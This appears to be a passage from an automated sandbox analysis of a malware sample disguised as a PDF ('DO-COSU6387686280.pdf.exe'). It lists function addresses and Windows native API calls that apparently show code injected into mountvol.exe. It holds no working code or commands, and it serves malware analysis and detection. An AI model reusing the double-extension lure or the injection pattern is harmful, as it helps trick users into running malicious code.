                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03122C70
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122C60 NtCreateKey,LdrInitializeThunk,6_2_03122C60
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03122CA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031235C0 NtCreateMutant,LdrInitializeThunk,6_2_031235C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031239B0 NtGetContextThread,LdrInitializeThunk,6_2_031239B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122B80 NtQueryInformationFile,6_2_03122B80
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122AB0 NtWaitForSingleObject,6_2_03122AB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122F60 NtCreateProcessEx,6_2_03122F60
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122F90 NtProtectVirtualMemory,6_2_03122F90
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122FA0 NtQuerySection,6_2_03122FA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122E30 NtWriteVirtualMemory,6_2_03122E30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122EA0 NtAdjustPrivilegesToken,6_2_03122EA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122D00 NtSetInformationFile,6_2_03122D00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122DB0 NtEnumerateKey,6_2_03122DB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122C00 NtQueryInformationProcess,6_2_03122C00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122CC0 NtQueryVirtualMemory,6_2_03122CC0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122CF0 NtOpenProcess,6_2_03122CF0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03123010 NtOpenDirectoryObject,6_2_03123010
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03123090 NtSetValueKey,6_2_03123090
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03123D10 NtOpenProcessToken,6_2_03123D10
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03123D70 NtOpenThread,6_2_03123D70
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A496D0 NtDeleteFile,6_2_02A496D0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A49770 NtClose,6_2_02A49770
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A49470 NtCreateFile,6_2_02A49470
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A495E0 NtReadFile,6_2_02A495E0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A498D0 NtAllocateVirtualMemory,6_2_02A498D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_013ED51C0_2_013ED51C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E761700_2_05E76170
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E762130_2_05E76213
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E705600_2_05E70560
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E7054F0_2_05E7054F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E796080_2_05E79608
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E791D00_2_05E791D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E761610_2_05E76161
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E782A00_2_05E782A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E782900_2_05E78290
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E7B2280_2_05E7B228
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E7B2180_2_05E7B218
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E78D780_2_05E78D78
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 0_2_05E7B8100_2_05E7B810
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018541A23_2_018541A2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018601AA3_2_018601AA
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018581CC3_2_018581CC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017901003_2_01790100
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183A1183_2_0183A118
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018281583_2_01828158
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018320003_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018603E63_2_018603E6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE3F03_2_017AE3F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185A3523_2_0185A352
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018202C03_2_018202C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018402743_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018605913_2_01860591
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A05353_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184E4F63_2_0184E4F6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018444203_2_01844420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018524463_2_01852446
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A07703_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C47503_2_017C4750
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179C7C03_2_0179C7C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BC6E03_2_017BC6E0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B69623_2_017B6962
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0186A9A63_2_0186A9A6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A29A03_2_017A29A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A28403_2_017A2840
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AA8403_2_017AA840
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE8F03_2_017CE8F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017868B83_2_017868B8
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01856BD73_2_01856BD7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185AB403_2_0185AB40
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179EA803_2_0179EA80
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AAD003_2_017AAD00
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179ADE03_2_0179ADE0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183CD1F3_2_0183CD1F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B8DBF3_2_017B8DBF
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840CB53_2_01840CB5
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0C003_2_017A0C00
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01790CF23_2_01790CF2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181EFA03_2_0181EFA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C0F303_2_017C0F30
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E2F283_2_017E2F28
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017ACFE03_2_017ACFE0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01792FC83_2_01792FC8
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01842F303_2_01842F30
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01814F403_2_01814F40
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185CE933_2_0185CE93
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0E593_2_017A0E59
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185EEDB3_2_0185EEDB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185EE263_2_0185EE26
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B2E903_2_017B2E90
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178F1723_2_0178F172
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D516C3_2_017D516C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AB1B03_2_017AB1B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0186B16B3_2_0186B16B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184F0CC3_2_0184F0CC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185F0E03_2_0185F0E0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018570E93_2_018570E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A70C03_2_017A70C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178D34C3_2_0178D34C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185132D3_2_0185132D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E739A3_2_017E739A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018412ED3_2_018412ED
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BB2C03_2_017BB2C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A52A03_2_017A52A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183D5B03_2_0183D5B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018695C33_2_018695C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018575713_2_01857571
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017914603_2_01791460
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185F43F3_2_0185F43F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185F7B03_2_0185F7B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018516CC3_2_018516CC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E56303_2_017E5630
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A99503_2_017A9950
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BB9503_2_017BB950
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018359103_2_01835910
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180D8003_2_0180D800
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A38E03_2_017A38E0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01815BF03_2_01815BF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017DDBF93_2_017DDBF9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FB763_2_0185FB76
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BFB803_2_017BFB80
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01841AA33_2_01841AA3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183DAAC3_2_0183DAAC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184DAC63_2_0184DAC6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01857A463_2_01857A46
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FA493_2_0185FA49
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E5AA03_2_017E5AA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01813A6C3_2_01813A6C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A3D403_2_017A3D40
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BFDC03_2_017BFDC0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01851D5A3_2_01851D5A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01857D733_2_01857D73
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FCF23_2_0185FCF2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01819C323_2_01819C32
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FFB13_2_0185FFB1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185FF093_2_0185FF09
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01763FD53_2_01763FD5
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01763FD23_2_01763FD2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A1F923_2_017A1F92
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A9EB03_2_017A9EB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004188E33_2_004188E3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041006A3_2_0041006A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004100733_2_00410073
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0040E2733_2_0040E273
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004102933_2_00410293
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0040E3C33_2_0040E3C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0040E3B73_2_0040E3B7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004027103_2_00402710
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_00416A6B3_2_00416A6B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_00416AE33_2_00416AE3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004030303_2_00403030
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0042F0833_2_0042F083
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AA3526_2_031AA352
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031B03E66_2_031B03E6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FE3F06_2_030FE3F0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031902746_2_03190274
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031702C06_2_031702C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0318A1186_2_0318A118
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E01006_2_030E0100
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031781586_2_03178158
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031B01AA6_2_031B01AA
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A41A26_2_031A41A2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A81CC6_2_031A81CC
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031820006_2_03182000
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031147506_2_03114750
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F07706_2_030F0770
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030EC7C06_2_030EC7C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310C6E06_2_0310C6E0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F05356_2_030F0535
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031B05916_2_031B0591
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031944206_2_03194420
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A24466_2_031A2446
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0319E4F66_2_0319E4F6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AAB406_2_031AAB40
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A6BD76_2_031A6BD7
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030EEA806_2_030EEA80
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031069626_2_03106962
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F29A06_2_030F29A0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031BA9A66_2_031BA9A6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F28406_2_030F2840
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FA8406_2_030FA840
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030D68B86_2_030D68B8
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0311E8F06_2_0311E8F0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03110F306_2_03110F30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03192F306_2_03192F30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03132F286_2_03132F28
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03164F406_2_03164F40
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0316EFA06_2_0316EFA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E2FC86_2_030E2FC8
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FCFE06_2_030FCFE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AEE266_2_031AEE26
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F0E596_2_030F0E59
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03102E906_2_03102E90
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031ACE936_2_031ACE93
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AEEDB6_2_031AEEDB
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0318CD1F6_2_0318CD1F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FAD006_2_030FAD00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03108DBF6_2_03108DBF
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030EADE06_2_030EADE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F0C006_2_030F0C00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03190CB56_2_03190CB5
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E0CF26_2_030E0CF2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A132D6_2_031A132D
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030DD34C6_2_030DD34C
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0313739A6_2_0313739A
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F52A06_2_030F52A0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310B2C06_2_0310B2C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031912ED6_2_031912ED
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031BB16B6_2_031BB16B
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0312516C6_2_0312516C
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030DF1726_2_030DF172
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FB1B06_2_030FB1B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F70C06_2_030F70C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0319F0CC6_2_0319F0CC
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A70E96_2_031A70E9
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AF0E06_2_031AF0E0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AF7B06_2_031AF7B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031356306_2_03135630
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A16CC6_2_031A16CC
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A75716_2_031A7571
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0318D5B06_2_0318D5B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031B95C36_2_031B95C3
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AF43F6_2_031AF43F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E14606_2_030E1460
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFB766_2_031AFB76
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310FB806_2_0310FB80
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03165BF06_2_03165BF0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0312DBF96_2_0312DBF9
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFA496_2_031AFA49
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A7A466_2_031A7A46
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03163A6C6_2_03163A6C
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03135AA06_2_03135AA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0318DAAC6_2_0318DAAC
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03191AA36_2_03191AA3
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0319DAC66_2_0319DAC6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031859106_2_03185910
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310B9506_2_0310B950
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F99506_2_030F9950
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0315D8006_2_0315D800
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F38E06_2_030F38E0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFF096_2_031AFF09
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F1F926_2_030F1F92
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFFB16_2_031AFFB1
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B3FD26_2_030B3FD2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B3FD56_2_030B3FD5
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F9EB06_2_030F9EB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A1D5A6_2_031A1D5A
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F3D406_2_030F3D40
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A7D736_2_031A7D73
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310FDC06_2_0310FDC0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03169C326_2_03169C32
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFCF26_2_031AFCF2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A31F306_2_02A31F30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2AFA06_2_02A2AFA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2CFC06_2_02A2CFC0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2CDA06_2_02A2CDA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2CD976_2_02A2CD97
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2B0E46_2_02A2B0E4
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2B0F06_2_02A2B0F0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A356106_2_02A35610
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A337986_2_02A33798
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A338106_2_02A33810
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A4BDB06_2_02A4BDB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BE30C6_2_034BE30C
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BE3346_2_034BE334
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BE7EE6_2_034BE7EE
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BE4536_2_034BE453
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BD8B86_2_034BD8B8
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 0315EA12 appears 86 times
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 03137E54 appears 111 times
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 03125130 appears 58 times
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 0316F290 appears 105 times
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 030DB970 appears 280 times
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 017E7E54 appears 111 times
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 017D5130 appears 58 times
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 0180EA12 appears 86 times
